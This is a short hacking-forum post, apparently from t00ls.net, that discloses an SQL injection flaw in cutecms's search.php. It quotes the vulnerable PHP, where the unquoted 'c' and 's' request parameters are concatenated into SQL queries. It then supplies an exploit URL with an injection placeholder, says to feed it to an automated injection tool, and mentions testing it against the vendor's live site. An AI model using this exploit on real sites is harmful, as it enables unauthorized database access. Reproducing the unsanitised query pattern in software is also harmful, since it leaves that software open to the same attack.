From:http://t00ls.net/thread-20189-1-1.html


search.php

略。。
 $c = strval($_GET['c']); 
 $s = strval(trim($_GET['s']));
 $hit = intval($hit);
略

if($c) {

         $bullet = "<img src='".DOMAINPATH."template/".$GLOBALS['cfg']['template']."/images/nav_bullet.gif' width=\"4\" height=\"7\" alt=\"bullet\" />";

         $channelPath = $ch->getChannelPath($channelArr); //栏目页导航路径

         if($c==15) { //都是引号惹的祸。。没引号就是蛋疼
                 $channelType = 100;
                 $searchTable = 'product';
                 $condition = " AND (name LIKE '%$s%' OR des LIKE '%$s%')";
         }
         else if($c==5) {
                 $channelType = 40;
                 $searchTable = 'channel_content';
                 $condition = " AND (title LIKE '%$s%' OR des LIKE '%$s%')";
         }

         $ch->getSubChannelIdArr($c, $channelType);
         $ch->channelSubIdArr[] = $c; //赋值
         
         $channelSubIds = @join(",", $ch->channelSubIdArr);

         $sql = "SELECT COUNT(*) FROM ".PREFIX.$searchTable." WHERE pid IN ($channelSubIds)"; //this...
         if($s) {
                // $condition .= " AND (title LIKE '%$s%' OR des LIKE '%$s%')";
                 $sql .= $condition;
         }

         $total = $db->getOne($sql);

exp http://127.0.0.1/search.php?c=15)%20and%201=%Inject_Here%%20and%201=(select%201
丢大萝卜里就行了

官方测试。。(应为我本机没安装成。。) 

 cutecms 注入漏洞